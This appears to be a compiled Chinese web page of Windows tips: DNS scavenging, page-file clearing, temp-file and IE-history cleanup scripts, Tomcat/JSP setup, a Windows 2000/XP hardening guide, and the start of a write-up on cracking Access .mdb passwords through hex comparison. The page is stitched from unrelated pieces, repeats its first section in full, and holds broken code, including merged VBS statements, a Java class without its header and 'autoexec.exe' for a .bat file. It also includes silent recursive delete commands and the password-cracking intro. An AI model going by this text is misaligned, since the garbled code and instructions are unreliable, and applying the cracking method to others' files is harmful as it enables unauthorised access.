1. 打开 DNS。
2.在控制台树中,右键单击适当的 DNS 服务器,然后单击“属性”。
3. 单击“高级”选项卡。
4. 选中“启用过时资源记录自动清理”复选框。
5. 要调整“清理周期”,请在下拉列表中选择以小时或天为单位的时间间隔,然后在文本框中键入一个数。
注意
要执行该过程,您必须是本地计算机上 Administrators 组的成员,或者您必须被委派了适当的权限。如果计算机已加入某个域,则 Domain Admins 组的成员可能会执行该过程。作为安全性最佳操作,请考虑使用“运行方式”执行此过程。详细信息,请参阅默认本地组、默认组以及使用“运行方式”。
要打开“DNS”,请依次单击“开始”和“控制面板”,双击“管理工具”,然后双击“DNS”。
让XP关机时自动清理页面文件
使用电脑时,一些Word文档或者打开的网页等就会被载入到内存,而为了节省出内存空间,Windows会把不同的文件放到系统的页面文件中,页面文件就象一个临时仓库。微软提供了一种方法可以在关闭Windows XP时自动清理页面文件,默认情况下这一功能是关闭的,下面我们将介绍如何启用这一功能。不过要注意的是,启用这一功能后,因为要执行清理操作,所以关机时间将会变长。(相关文章:XP网络不能互访的解决之道)
操作步骤
1.单击“开始”菜单, 单击“运行”,在对话框中输入“Regedit”,然后单击“确定”,运行“注册表编辑器”。如果不熟悉注册表知识,可以先看一下这里。
2.浏览到“HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory Management”,然后在右边的列表中双击“ClearPageFileAtShutdown”。
3.在弹出的“编辑DWORD”值对话框中,选择基数为十六进制,并将左边的“数值数据”改为1,这样就启用了关机时自动清理页面文件功能。
4.重新启动计算机,使修改生效
清除IE临时文件
Windows或应用程序在运行时通常都会产生临时文件,虽然部分临时文件在Windows或应用程序正常退出时会被自动删除,但由于Windows的不稳定,或者是因为程序功能的不完善,经常会有临时文件成为“漏网之鱼”。这样,随着时间的推移,临时文件逐渐堆积,不仅占用了用户宝贵的硬盘空间,而且也极大地影响了系统的运行效率。下面,笔者就如何有效地删除临时文件给出两种方法,希望能给大家一些启示。
方法一:打开“开始”菜单,选择“搜索→文件或文件夹”,然后在对话框的“要搜索的文件或文件夹名为”栏内输入“*.tmp”(tmp为临时文件的后缀名),在对话框的“搜索范围”栏的下拉列表中选择“本机硬盘驱动器”,单击“搜索选项”,勾选“高级选项”及其下的“搜索子文件夹”项,最后单击“立即搜索”按钮。待搜索完毕后,切换至“搜索结果”页面,按“Ctrl+A”组合键或选择工具栏菜单的“编辑→全部选定”项选择所有的文件,按“Del”键或选择工具栏菜单的“文件→删除”项,即可一次性删除用户计算机上所有以.tmp为后缀的临时文件。
方法二:为了加快访问速度,IE会将曾经浏览过的网页等内容存放在Temporary Internet Files文件夹中。如果我们不希望他人从这里窥视自己的秘密,可以利用关机脚本让系统自动在关机前进行清理,这里介绍一下具体的操作(以Windows XP为例)。
在“C:\Windows\System32\GroupPolicy\Machine\Scripts\Shutdown”目录下,新建一个批处理文件Cleanup.bat,内容可根据需要编写。清除IE临时文件的命令为“DEL/Q/S "C:\Documents and Settings\<用户名>\Local Settings\Temporary Internet Files"”。其中参数/Q表示使用安静模式,即删除全局通配符时,不要求确认;参数/S表示从所有子目录删除文件。
单击“开始” “运行”,在运行命令框中输入“Gpedit.msc”,打开组策略窗口。在左侧的控制台树窗格中,依次展开“计算机配置” “Windows设置” “脚本(启动/关机)”节点,双击右侧详细资料窗格中的“关机”项目,在弹出的“关机属性”对话框中点击“添加”按钮,将Cleanup.bat添加为新的计算机关机脚本。设置完成后,退出组策略窗口,重新启动计算机即可。
方法三:打开“开始”菜单,选择“程序→MS-DOS方式”,用纯文本编辑器编辑Autoexec.bat文件(即在DOS方式下运行命令:“edit autoexec.exe”),在这个自动运行的批处理文件中,环境变量temp和tmp定义了Windows运行过程中临时文件的存储位置,默认位置为“\windows\temp”文件夹)。
原Autoexec.bat文件为:
SET COMSPEC=C:\WINDOWS\COMMAND.COM
SET windir=C:\WINDOWS
SET winbootdir=C:\WINDOWS
SET PATH=C:\WINDOWS;C:\WINDOWS\COMMAND
SET PROMPT=$p$g
SET TEMP=c:\windows\temp
SET TMP=c:\windows\temp
经编辑后的Autoexec.bat文件为:
SET COMSPEC=C:\WINDOWS\COMMAND.COM
SET windir=C:\WINDOWS
SET winbootdir=C:\WINDOWS
SET PATH=C:\WINDOWS;C:\WINDOWS\COMMAND
SET PROMPT=$p$g
deltree /Y x:\temp(删除临时文件文件夹,其中x为该文件夹所在的驱动器)
md x:\temp(创建临时文件文件夹,X为你的盘符)
SET TEMP=d:\temp
SET TMP=d:\temp
文件编辑完毕后存盘即可。经过以上的设定,用户以后每次启动计算机都会自动删除临时文件。
清除IE地址栏记录
前面清除的IE历史记录还不够彻底,当我们在IE地址栏中输入与曾经输入过的URL一样的字符串时,仍会显示出相关的网址记录。要想清除这些记录,则必须将注册表[HKEY CURRENT USER\Software\Microsoft\Internet Explorer\TypedURLs]分支下的键值全部删除。
用记事本创建一个脚本文件,脚本内容如下:
Dim WSHShell
Set WSHShell = WScript.CreateObject("WScript.Shell")
WSHShell.RegWrite "HKCU\Software\Microsoft\Internet Explorer\TypedURLs\", ""WSHShell.RegDelete "HKCU\Software\Microsoft\Internet Explorer\TypedURLs\"上述脚本共有四句:第一句定义一个变量WSHShell,第二句创建一个对象,第三句写入注册表,如果注册表中不存在该项,执行脚本时会出现错误提示。输入以上内容后将其保存为Cleanup.vbs。注意,后缀名一定要是vbs,这样才能保证脚本的正常执行。
编写完成后,在组策略窗口中依次展开“用户配置” “Windows设置” “脚本(登录/注销)”节点,双击右侧窗格中的“注销”项目,在弹出的“注销属性”对话框中点击“添加”按钮,将Cleanup.vbs添加为注销脚本。这样,当计算机注销或关机时就会自动清除IE地址栏记录。
前面介绍了利用关机和注销脚本自动清理上网痕迹的方法,如果你还有其它的项目需要清理,也可以参照上述方法。这里要提醒读者的是,利用脚本实现自动清理前,最好先用手工方式彻底清理一次。
清除IE历史记录
清除IE历史记录通常的方法是“Internet选项” “常规” “清除历史记录”。不过,我们同样可以利用关机脚本来实现自动清理。在前面建立的Cleanup.bat批处理文件中添加一条命令“DEL/Q/S "C:\Documents and Settings\<用户名>\Local Settings\History"”即可。
Windows操作系统使用记录自动清除技巧
启用过时资源记录自动清理
1. 打开 DNS。
2.在控制台树中,右键单击适当的 DNS 服务器,然后单击“属性”。
3. 单击“高级”选项卡。
4. 选中“启用过时资源记录自动清理”复选框。
5. 要调整“清理周期”,请在下拉列表中选择以小时或天为单位的时间间隔,然后在文本框中键入一个数。
注意
要执行该过程,您必须是本地计算机上 Administrators 组的成员,或者您必须被委派了适当的权限。如果计算机已加入某个域,则 Domain Admins 组的成员可能会执行该过程。作为安全性最佳操作,请考虑使用“运行方式”执行此过程。详细信息,请参阅默认本地组、默认组以及使用“运行方式”。
要打开“DNS”,请依次单击“开始”和“控制面板”,双击“管理工具”,然后双击“DNS”。
让XP关机时自动清理页面文件
使用电脑时,一些Word文档或者打开的网页等就会被载入到内存,而为了节省出内存空间,Windows会把不同的文件放到系统的页面文件中,页面文件就象一个临时仓库。微软提供了一种方法可以在关闭Windows XP时自动清理页面文件,默认情况下这一功能是关闭的,下面我们将介绍如何启用这一功能。不过要注意的是,启用这一功能后,因为要执行清理操作,所以关机时间将会变长。(相关文章:XP网络不能互访的解决之道)
操作步骤
1.单击“开始”菜单, 单击“运行”,在对话框中输入“Regedit”,然后单击“确定”,运行“注册表编辑器”。如果不熟悉注册表知识,可以先看一下这里。
2.浏览到“HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory Management”,然后在右边的列表中双击“ClearPageFileAtShutdown”。
3.在弹出的“编辑DWORD”值对话框中,选择基数为十六进制,并将左边的“数值数据”改为1,这样就启用了关机时自动清理页面文件功能。
4.重新启动计算机,使修改生效
清除IE临时文件
Windows或应用程序在运行时通常都会产生临时文件,虽然部分临时文件在Windows或应用程序正常退出时会被自动删除,但由于Windows的不稳定,或者是因为程序功能的不完善,经常会有临时文件成为“漏网之鱼”。这样,随着时间的推移,临时文件逐渐堆积,不仅占用了用户宝贵的硬盘空间,而且也极大地影响了系统的运行效率。下面,笔者就如何有效地删除临时文件给出两种方法,希望能给大家一些启示。
方法一:打开“开始”菜单,选择“搜索→文件或文件夹”,然后在对话框的“要搜索的文件或文件夹名为”栏内输入“*.tmp”(tmp为临时文件的后缀名),在对话框的“搜索范围”栏的下拉列表中选择“本机硬盘驱动器”,单击“搜索选项”,勾选“高级选项”及其下的“搜索子文件夹”项,最后单击“立即搜索”按钮。待搜索完毕后,切换至“搜索结果”页面,按“Ctrl+A”组合键或选择工具栏菜单的“编辑→全部选定”项选择所有的文件,按“Del”键或选择工具栏菜单的“文件→删除”项,即可一次性删除用户计算机上所有以.tmp为后缀的临时文件。
方法二:为了加快访问速度,IE会将曾经浏览过的网页等内容存放在Temporary Internet Files文件夹中。如果我们不希望他人从这里窥视自己的秘密,可以利用关机脚本让系统自动在关机前进行清理,这里介绍一下具体的操作(以Windows XP为例)。
在“C:\Windows\System32\GroupPolicy\Machine\Scripts\Shutdown”目录下,新建一个批处理文件Cleanup.bat,内容可根据需要编写。清除IE临时文件的命令为“DEL/Q/S "C:\Documents and Settings\<用户名>\Local Settings\Temporary Internet Files"”。其中参数/Q表示使用安静模式,即删除全局通配符时,不要求确认;参数/S表示从所有子目录删除文件。
单击“开始” “运行”,在运行命令框中输入“Gpedit.msc”,打开组策略窗口。在左侧的控制台树窗格中,依次展开“计算机配置” “Windows设置” “脚本(启动/关机)”节点,双击右侧详细资料窗格中的“关机”项目,在弹出的“关机属性”对话框中点击“添加”按钮,将Cleanup.bat添加为新的计算机关机脚本。设置完成后,退出组策略窗口,重新启动计算机即可。
方法三:打开“开始”菜单,选择“程序→MS-DOS方式”,用纯文本编辑器编辑Autoexec.bat文件(即在DOS方式下运行命令:“edit autoexec.exe”),在这个自动运行的批处理文件中,环境变量temp和tmp定义了Windows运行过程中临时文件的存储位置,默认位置为“\windows\temp”文件夹)。
原Autoexec.bat文件为:
SET COMSPEC=C:\WINDOWS\COMMAND.COM
SET windir=C:\WINDOWS
SET winbootdir=C:\WINDOWS
SET PATH=C:\WINDOWS;C:\WINDOWS\COMMAND
SET PROMPT=$p$g
SET TEMP=c:\windows\temp
SET TMP=c:\windows\temp
经编辑后的Autoexec.bat文件为:
SET COMSPEC=C:\WINDOWS\COMMAND.COM
SET windir=C:\WINDOWS
SET winbootdir=C:\WINDOWS
SET PATH=C:\WINDOWS;C:\WINDOWS\COMMAND
SET PROMPT=$p$g
deltree /Y x:\temp(删除临时文件文件夹,其中x为该文件夹所在的驱动器)
md x:\temp(创建临时文件文件夹,X为你的盘符)
SET TEMP=d:\temp
SET TMP=d:\temp
文件编辑完毕后存盘即可。经过以上的设定,用户以后每次启动计算机都会自动删除临时文件。
清除IE地址栏记录
前面清除的IE历史记录还不够彻底,当我们在IE地址栏中输入与曾经输入过的URL一样的字符串时,仍会显示出相关的网址记录。要想清除这些记录,则必须将注册表[HKEY CURRENT USER\Software\Microsoft\Internet Explorer\TypedURLs]分支下的键值全部删除。
用记事本创建一个脚本文件,脚本内容如下:
Dim WSHShell
Set WSHShell = WScript.CreateObject("WScript.Shell")
WSHShell.RegWrite "HKCU\Software\Microsoft\Internet Explorer\TypedURLs\", ""WSHShell.RegDelete "HKCU\Software\Microsoft\Internet Explorer\TypedURLs\"上述脚本共有四句:第一句定义一个变量WSHShell,第二句创建一个对象,第三句写入注册表,如果注册表中不存在该项,执行脚本时会出现错误提示。输入以上内容后将其保存为Cleanup.vbs。注意,后缀名一定要是vbs,这样才能保证脚本的正常执行。
编写完成后,在组策略窗口中依次展开“用户配置” “Windows设置” “脚本(登录/注销)”节点,双击右侧窗格中的“注销”项目,在弹出的“注销属性”对话框中点击“添加”按钮,将Cleanup.vbs添加为注销脚本。这样,当计算机注销或关机时就会自动清除IE地址栏记录。
前面介绍了利用关机和注销脚本自动清理上网痕迹的方法,如果你还有其它的项目需要清理,也可以参照上述方法。这里要提醒读者的是,利用脚本实现自动清理前,最好先用手工方式彻底清理一次。
清除IE历史记录
清除IE历史记录通常的方法是“Internet选项” “常规” “清除历史记录”。不过,我们同样可以利用关机脚本来实现自动清理。在前面建立的Cleanup.bat批处理文件中添加一条命令“DEL/Q/S "C:\Documents and Settings\<用户名>\Local Settings\History"”即可。
推荐:Tomcat JSP经典配置实例
一、开发环境配置
第一步:下载j2sdk和tomcat:到sun官方站(http://java.sun.com/j2se/1.5.0/download.jsp)下载j2sdk,注意下载版本为Windows Offline Installation的SDK,同时最好下载J2SE 1.5.0 Documentation,然后到tomcat官方站点(http://jakarta.apache.org/site/downloads/downloads_tomcat-5.cgi)下载tomcat(下载最新5.5.9版本的tomcat);
第二步:安装和配置你的j2sdk和tomcat:执行j2sdk和tomcat的安装程序,然后按默认设置进行安装即可。
1.安装j2sdk以后,需要配置一下环境变量,在我的电脑->属性->高级->环境变量->系统变量中添加以下环境变量(假定你的j2sdk安装在c:\j2sdk1.5.0):
classpath=.;%JAVA_HOME%\lib\dt.jar;%JAVA_HOME%\lib\tools.jar;(.;一定不能少,因为它代表当前路径)
path=%JAVA_HOME%\bin
接着可以写一个简单的java程序来测试J2SDK是否已安装成功:
public static void main(String args[]){
System.out.println("This is a test program.");
}
}
将上面的这段程序保存为文件名为Test.java的文件。
然后打开命令提示符窗口,cd到你的Test.java所在目录,然后键入下面的命令
java Test
此时如果看到打印出来This is a test program.的话说明安装成功了,如果没有打印出这句话,你需要仔细检查一下你的配置情况。
2.安装Tomcat后,在我的电脑->属性->高级->环境变量->系统变量中添加以下环境变量(假定你的tomcat安装在c:\tomcat):
CATALINA_HOME=c:\tomcat
CATALINA_BASE=c:\tomcat
然后修改环境变量中的classpath,把tomat安装目录下的common\lib下的(可以根据实际追加)servlet.jar追加到classpath中去,修改后的classpath如下:
接着可以启动tomcat,在IE中访问http://localhost:8080,如果看到tomcat的欢迎页面的话说明安装成功了。
第三步:建立自己的jsp app目录
1.到Tomcat的安装目录的webapps目录,可以看到ROOT,examples, tomcat-docs之类Tomcat自带的的目录;
2.在webapps目录下新建一个目录,起名叫myapp;
3.myapp下新建一个目录WEB-INF,注意,目录名称是区分大小写的;
4.WEB-INF下新建一个文件web.xml,内容如下:
<!DOCTYPE web-app
PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
"http://java.sun.com/dtd/web-app_2_3.dtd">
<web-app>
<display-name>My Web Application</display-name>
<description>
A application for test.
</description>
</web-app>
5.在myapp下新建一个测试的jsp页面,文件名为index.jsp,文件内容如下:
<body>
<center>
Now time is: <%=new java.util.Date()%>
</center>
</body>
</html>
6.重启Tomcat
7.打开浏览器,输入http://localhost:8080/myapp/index.jsp 看到当前时间的话说明就成功了。
第四步:建立自己的Servlet:
1.用你最熟悉的编辑器(建议使用有语法检查的java ide)新建一个servlet程序,文件名为Test.java,文件内容如下:
import java.io.IOException;
import java.io.PrintWriter;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
public class Test extends HttpServlet {
protected void doGet(HttpServletRequest request, HttpServletResponse response)
throws ServletException, IOException {
PrintWriter out=response.getWriter();
out.println("<html><body><h1>This is a servlet test.</h1></body></html>");
out.flush();
}
}
}
2 .编译
将Test.java放在c:\test下,使用如下命令编译:
C:\Test>javac Test.java
然后在c:\Test下会产生一个编译后的servlet文件:Test.class
3 .将结构test\Test.class剪切到%CATALINA_HOME%\webapps\myapp\WEB-INF\classes下,也就是剪切那个test目录到classes目录下,如果classes目录不存在,就新建一个。 现在webapps\myapp\WEB-INF\classes下有test\Test.class的文件目录结构
4 .修改webapps\myapp\WEB-INF\web.xml,添加servlet和servlet-mapping
编辑后的web.xml如下所示,红色为添加的内容:
<!DOCTYPE web-app
PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
"http://java.sun.com/dtd/web-app_2_3.dtd">
<web-app>
<display-name>My Web Application</display-name>
<description>
A application for test.
</description>
<servlet>
<servlet-name>Test</servlet-name>
<display-name>Test</display-name>
<description>A test Servlet</description>
<servlet-class>test.Test</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>Test</servlet-name>
<url-pattern>/Test</url-pattern>
</servlet-mapping>
</web-app>
5 .好了,重启动Tomcat,启动浏览器,输入http://localhost:8080/myapp/Test 如果看到输出This is a servlet test.就说明编写的servlet成功了。
注意:修改了web.xml以及新加了class,都要重启Tomcat
第四步:建立自己的Bean:
1.用你最熟悉的编辑器(建议使用有语法检查的java ide)新建一个java程序,文件名为TestBean.java,文件内容如下:
public class TestBean{
private String name = null;
public TestBean(String strName_p){
this.name=strName_p;
}
public void setName(String strName_p){
this.name=strName_p;
}
public String getName(){
return this.name;
}
}
将TestBean.java放在c:\test下,使用如下命令编译:
C:\Test>javac TestBean.java
然后在c:\Test下会产生一个编译后的bean文件:TestBean.class
3 .将TestBean.class文件剪切到 %CATALINA_HOME%\webapps\myapp\WEB-INF\classes\test下,
4 .新建一个TestBean.jsp文件,文件内容为:
<html>
<body>
<center>
<%
TestBean testBean=new TestBean("This is a test java bean.");
%>
Java bean name is: <%=testBean.getName()%>
</center>
</body>
</html>
5 .好了,重启Tomcat,启动浏览器,输入http://localhost:8080/myapp/TestBean.jsp 如果看到输出Java bean name is: This is a test java bean.就说明编写的Bean成功了。
这样就完成了整个Tomcat下的jsp、servlet和javabean的配置。接下来需要做的事情就是多看书、多读别人的好代码,自己多动手写代码以增强自己在这方面开发的能力了。
操作系统安全 我的地盘自然我做主
下面就开始我们的安全之旅吧。
一、安装过程
1、有选择性地安装组件
安装操作系统时请用NTFS格式, 不要按Windows 2000的默认安装组件,本着“最少的服务+最小的权限=最大的安全”原则,只选择安装需要的服务即可。例如:不作为Web服务器或FTP服务器就不安装IIS。常用Web服务器需要的最小组件是: Internet 服务管理器、WWW服务器和与其有关的辅助服务。如果是默认安装了IIS服务自己又不需要的就将其卸载。卸载办法:开始---->设置---->控制面板---->添加删除程序---->添加/删除Windows组件,在“windows组件向导”的“组件(C):”中将“Internet信息服务(IIS)”前面小框中的√去掉,然后“下一步”就卸载了IIS。
2、网络连接
在安装完成Windows 2000/XP操作系统后,不要立即连入网络,因为这时系统上的各种程序还没有打上补丁,存在各种漏洞,非常容易感染病毒和被入侵,此时应该安装杀毒软件和防火墙。杀毒软件和防火墙推荐使用卡巴斯基、诺顿企业版客户端(若做服务器则用服务端)和ZoneAlarm防火墙。接着,再把下面的事情做完后再上网。
二、正确设置和管理账户
1、停止使用Guest账户,并给Guest 加一个复杂的密码。所谓的复杂密码就是密码含大小写字母、数字、特殊字符(~!@#¥%《》,。?)等。比如象:“G7Y3,^)y。
2、账户要尽可能少,并且要经常用一些扫描工具查看一下系统账户、账户权限及密码。删除停用的账户,常用的扫描软件有:流光、HSCAN、X-SCAN、STAT SCANNER等。正确配置账户的权限,密码至少应不少于8位,比如:"3H.#4d&j1)~w",呵呵……让他破吧!!这样的密码他可能把机子跑烂也跑不出来哦 ^_^
3、增加登录的难度,在“账户策略→密码策略”中设定:“密码复杂性要求启用”,“密码长度最小值8位”,“强制密码历史5次”,“最长存留期 30天”;在“账户策略→账户锁定策略”设定:“账户锁定3次错误登录”,“锁定时间30分钟”,“复位锁定计数30分钟”等,增加了登录的难度对系统的安全大有好处。
4、把系统Administrator账号改名,名称不要带有Admin等字样; 创建一个陷阱帐号,如创建一个名为“Administrator”的本地帐户,把权限设置成最低,什么事也干不了,并且加上一个超过10位的超级复杂密码。这样可以让那些“不法之徒”忙上一段时间了,并且可以借此发现他们的入侵企图。
三、正确地设置目录和文件权限(这步可以在以后做)
为了控制好服务器上用户的权限,同时也为了预防以后可能的入侵和溢出,还必须非常小心地设置目录和文件的访问权限。Windows 2000/XP Pro的访问权限分为:读取、写入、读取及执行、修改、列目录、完全控制。在默认的情况下,大多数的文件夹对所有用户(Everyone这个组)是完全控制的(Full Control),您需要根据应用的需要重新设置权限。在进行权限控制时,请记住以下几个原则:
㈠权限是累计的,如果一个用户同时属于两个组,那么他就有了这两个组所允许的所有权限。
②拒绝的权限要比允许的权限高(拒绝策略会先执行)。如果一个用户属于一个被拒绝访问某个资源的组,那么不管其他的权限设置给他开放了多少权限,他也一定不能访问这个资源。
③文件权限比文件夹权限高。
④利用用户组来进行权限控制是一个成熟的系统管理员必须具有的优良习惯。
⑤只给用户真正需要的权限,权限的最小化原则是安全的重要保障。
⑥预防ICMP攻击。ICMP的风暴攻击和碎片攻击是NT主机比较头疼的攻击方法,而Windows 2000/2003应付的方法很简单。Windows 2000/2003自带一个Routing & Remote Access工具,这个工具初具路由器的雏形。在这个工具中,我们可以轻易地定义输入输出包过滤器。如设定输入ICMP代码255丢弃就表示丢弃所有的外来ICMP报文。
四、网络服务安全管理
1、关闭不需要的服务
只留必需的服务,多一些服务可能会给系统带来更多的安全因素。如Windows 2000/2003的Terminal Services(终端服务)、IIS(web服务)、RAS(远程访问服务)等,这些都有产生漏洞的可能。
2、关闭不用的端口。
3、只开放服务需要的端口与协议。
具体方法为:按顺序打开“网上邻居→属性→本地连接→属性→Internet 协议→属性→高级→选项→TCP/IP筛选→属性”,添加需要的TCP、UDP端口以及IP协议即可。根据服务开设口.
常用的TCP口有:80口用于Web服务;21用于FTP服务;25口用于SMTP;23口用于Telnet服务;110口用于POP3(邮件服务)。
常用的UDP端口有:53口-DNS域名解析服务;161口-snmp简单的网络管理协议。8000、4000用于OICQ,服务器用8000来接收信息,客户端用4000发送信息。如果没有上面这些服务就没有必要打开这些端口。
4、禁止建立空连接
Windows 2000/XP的默认安装允许任何用户可通过空连接连上服务器,枚举账号并猜测密码。空连接用的端口是139,通过空连接,可以复制文件到远端服务器,计划执行一个任务,这就是一个漏洞。可以通过以下两种方法禁止建立空连接:
A:修改注册表中Local_Machine\System\CurrentControlSet\Control\LSA-RestrictAnonymous 的值为1。
B:修改Windows 2000的本地安全策略。设置“本地安全策略→本地策略→选项”中的RestrictAnonymous(匿名连接的额外限制)为“不容许枚举SAM账号和共享”。
Windows 2000/XP的默认安装允许任何用户通过空连接得到系统所有账号和共享列表,这本来是为了方便局域网用户共享资源和文件的,但是,同时任何一个远程用户也可以通过同样的方法得到您的用户列表,并可能使用暴力法破解用户密码给整个网络带来破坏。很多人都只知道更改注册表Local_Machine\System\CurrentControlSet\Control\LSA-RestrictAnonymous = 1来禁止空用户连接,实际上Windows 2000/XP的本地安全策略里(如果是域服务器就是在域服务器安全和域安全策略里)就有RestrictAnonymous选项,其中有三个值:“0”这个值是系统默认的,没有任何限制,远程用户可以知道您机器上所有的账号、组信息、共享目录、网络传输列表(NetServerTransportEnum)等;“1”这个值是只允许非NULL用户存取SAM账号信息和共享信息;“2”这个值只有Windows 2000/XP才支持,需要注意的是,如果使用了这个值,就不能再共享资源了,所以还是推荐把数值设为“1”比较好。
五、关闭无用端口和修改3389端口
Windows的每一项服务都对应相应的端口,比如众如周知的www服务的端口是80,smtp是25,ftp是21,win2000/XP安装中这些服务都是默认开启的。对于个人用户来说确实没有必要,关掉端口也就是关闭了无用的服务。
关闭这些无用的服务可以通过“控制面板”的“管理工具”中的“服务”中来配置。
1、关闭7.9等等端口:关闭Simple TCP/IP Service,支持以下 TCP/IP 服务:Character Generator, Daytime, Discard, Echo, 以及 Quote of the Day。
2、关闭80口:关掉WWW服务。在“服务”中显示名称为"World Wide Web Publishing Service",通过 Internet 信息服务的管理单元提供 Web 连接和管理。
3、关掉25端口:关闭Simple Mail Transport Protocol (SMTP)服务,它提供的功能是跨网传送电子邮件。
4、关掉21端口:关闭FTP Publishing Service,它提供的服务是通过 Internet 信息服务的管理单元提供 FTP 连接和管理。
5、关掉23端口:关闭Telnet服务,它允许远程用户登录到系统并且使用命令行运行控制台程序。
6、还有一个很重要的就是关闭server服务,此服务提供 RPC 支持、文件、打印以及命名管道共享。关掉它就关掉了win2k的默认共享,比如ipc$、c$、admin$等等,此服务关闭不影响您的共他操作。
7、还有一个就是139端口,139端口是NetBIOS Session端口,用来文件和打印共享,注意的是运行samba的unix机器也开放了139端口,功能一样。以前流光2000用来判断对方主机类型不太准确,估计就是139端口开放既认为是NT机,现在好了。
关闭139端口的方法是在“网络和拨号连接”——“本地连接”中选取“Internet协议(TCP/IP)”属性,进入“高级TCP/IP设置”“WINS设置”里面有一项“禁用TCP/IP的NETBIOS”,打勾就关闭了139端口。
对于个人用户来说,可以在以上各项服务属性设置中设为“禁用”,以免下次重启服务也重新启动后端口再次打开。现在你不用担心你的端口和默认共享了。
8、修改3389:打开注册表HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\Wds\Repwd\Tds\Tcp, 看到那个PortNumber没有?0xd3d,这个是16进制,就是3389啦。我改XXXX这个值是RDP(远程桌面协议)的默认值,也就是说用来配置以后新建的RDP服务的,要改已经建立的RDP服务,我们去下一个键值:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations这里应该有一个或多个类似RDP-TCP的子健(取决于你建立了多少个RDP服务),一样改掉PortNumber。
六、本地安全策略
1、通过建立IP策略来阻止端口连接
TCP端口:21(FTP,换FTP端口)23(TELNET),53(DNS),135,136,137,138,139,443,445,1028,1433,3389
TCP端口:1080,3128,6588,8080(以上为代理端口).25(SMTP),161(SNMP),67(引导)
UDP端口:1434(这个就不用说了吧)
阻止所有ICMP,即阻止PING命令
2、在这里我用关闭135端口来实例讲解
具体见我的帖子《使用本地安全策略关闭端口(TCP/IP筛选)》
七、审核策略
具体方法:控制面板→管理工具→本地安全策略→本地策略→审核策略,然后右键点击下列各项,选择“安全性”来设置就可以了。
审核策略更改:成功,失败
审核登录事件:成功,失败
审核对象访问:失败
审核对象追踪:成功,失败
审核目录服务访问:失败
审核特权使用:失败
审核系统事件:成功,失败
审核账户登录事件:成功,失败
审核账户管理:成功,失败
密码策略:启用“密码必须符合复杂性要求","密码长度最小值"为6个字符,"强制密码历史"为5次,"密码最长存留期"为30天。
在账户锁定策略中设置:"复位账户锁定计数器"为30分钟之后,"账户锁定时间"为30分钟,"账户锁定值"为30分钟。
安全选项设置:本地安全策略→本地策略→安全选项→对匿名连接的额外限制,双击对其中有效策略进行设置,选择"不允许枚举SAM账号和共享",因为这个值是只允许非NULL用户存取SAM账号信息和共享信息,一般选择此项,然后再禁止登录屏幕上显示上次登录的用户名。
禁止登录屏幕上显示上次登录的用户名也可以改注册表HKEY_LOCAL_MACHINE\SOFTTWARE\Microsoft\WindowsNT\CurrentVesion\Winlogn项中的Don't Display Last User Name串,将其数据修改为1
八、Windows日志文件的保护
日志文件对我们如此重要,因此不能忽视对它的保护,防止发生某些“不法之徒”将日志文件清洗一空的情况。
1. 修改日志文件存放目录
Windows日志文件默认路径是“%systemroot%\system32\config”,我们可以通过修改注册表来改变它的存储目录,来增强对日志的保护。
点击“开始→运行”,在对话框中输入“Regedit”,回车后弹出注册表编辑器,依次展开HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog后,下面的Application、Security、System几个子项分别对应应用程序日志、安全日志、系统日志。
我以应用程序日志为例,将其转移到“d:\abc”目录下。首先选中Application子项,在右栏中找到File键,其键值为应用程序日志文件的路径“%SystemRoot%system32configAppEvent.Evt”,将它修改为“d:abc\AppEvent.Evt”。接着在D盘新建“abc”目录,将“AppEvent.Evt”拷贝到该目录下,重新启动系统,这样就完成了应用程序日志文件存放目录的修改。其它类型日志文件路径修改方法相同,只是在不同的子项下操作。
2. 设置文件访问权限
修改了日志文件的存放目录后,日志还是可以被清空的,下面通过修改日志文件访问权限,防止这种事情发生,前提是Windows系统要采用NTFS文件系统格式。
右键点击D盘的CCE目录,选择“属性”,切换到“安全”标签页后,首先取消“允许将来自父系的可继承权限传播给该对象”选项勾选。接着在账号列表框中选中“Everyone”账号,只给它赋予“读取”权限;然后点击“添加”按钮,将“System”账号添加到账号列表框中,赋予除“完全控制”和“修改”以外的所有权限,最后点击“确定”按钮。这样当用户清除Windows日志时,就会弹出错误对话框。
九、写在最后的话
现在你可以连接上网了,但是暂时不要打开IE浏览器。接下来工作是升级杀毒软件和防火墙,并设置好,具体设置方法请参照缔造论坛的相关教程。然后从开始菜单打开Windows update 打好系统所有的补丁,这个过程有点漫长,耐心等待吧。当你打好系统所有补丁后再备份好系统,呵呵……上网吧你安全了(注意!没有绝对的安全哦)!
破解.mdb目前所有版本密码
经过ccrun用一下午的时间研究,终于将Access2000的加密方式搞清楚了。嘿嘿。在此将偶的心得发布,希望对大家有用。
我用的分析工具是UltraEdit32 v10.00,编程工具是C++ Builder 6.0。
经过用UltraEdit32分析,发现Access2000和Access2002的数据库加密方式相同,所以以下只针对Access2000的mdb文件。还有就是我用的是16进制的数表示,所以前面加了0x,如果你用的是VB或其他,要注意数值哦。
首先用AccessXP创建了一个空密码的数据库文件db1.mdb,包含一个表,其中有一个字段,没有填任何数据。保存退出然后复制一份为db2.mdb,以独占方式打开2.mdb,并加上密码1324567890123 保存退出。
用UltraEdit32打开这两个数据库,并进行比较。我比较的方法也很简单。在UltraEdit32中,快速的来回点击被打开文件的选项卡(就是在两个文件间来回切换,呵呵。笨办法吧),发现从文件头开始0x42字节处发生变化。
db1.mdb
00000040h:BC 4E BE 68 EC 37 65 D7 9C FA FE CD 28 E6 2B 25 ;
00000050h:8A 60 6C 07 7B 36 CD E1 DF B1 4F 67 13 43 F7 3C ;
00000060h:B1 33 0C F2 79 5B AA 26 7C 2A 4F E9 7C 99 05 13 ;
db2.mdb
00000040h:BC 4E 8F 68 DE 37 56 D7 A8 FA CB CD 1E E6 1C 25 ;
00000050h:B2 60 55 07 4B 36 FC E1 ED B1 7C 67 13 43 F7 3C ;
